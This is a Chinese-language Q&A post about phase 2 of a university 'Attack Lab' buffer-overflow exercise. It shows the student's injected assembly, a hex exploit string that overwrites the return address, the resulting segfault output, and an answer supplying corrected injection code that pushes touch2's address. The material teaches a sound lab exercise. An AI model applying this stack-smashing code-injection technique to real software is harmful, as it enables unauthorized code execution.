我有一个名为The Attack Lab的项目必须做的缓冲区溢出实验。我处于实验的第二阶段,我必须将代码作为我的利用字符串的一部分插入,以使程序指向函数touch2()的地址。我已经说到输出表明它是第2阶段的有效解决方案,但是随后它说我造成了段错误,然后说我使该阶段失败了。
这是我收到的错误消息
cookie: 0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED
这是我在汇编中的攻击代码
mov1 $0x2d6fc2d5, %rdi
retq
这就是我传递给程序的内容
48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code
00 00 00 00 00 00 00 00 #padding of 0x38, amount needed to overwrite ret address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #address of rsp - 0x38
0d 18 40 00 00 00 00 00 #address of touch2()
我已经看过在线教程,并且已经花了几个小时进行研究,但是我还没有找到解决方案,所以我不确定是什么原因引起的。它说该解决方案是有效的,但随后会出现故障并失败。任何帮助将不胜感激,如果有需要澄清的地方,请告诉我!
答案 0 :(得分:0)
打印“有效解决方案”行等效于运行未经授权的代码,因此imo不论段错误如何,您都已经克服了挑战。
我相信您的填充物过多。缓冲区可能是24个字符,并且您有6行缓冲区,所以我猜您将经过rsp,跳转到无效的地方,从而导致段错误。
答案 1 :(得分:0)
似乎攻击实验室最近已进行了调整。 您应该避免覆盖堆栈中返回地址的下一部分
相反,您可以使用推指令将值添加到堆栈中。 尝试从输入中删除touch2地址,并使用以下代码。
mov $0x2d6fc2d5, %rdi
pushq $0x40180d
ret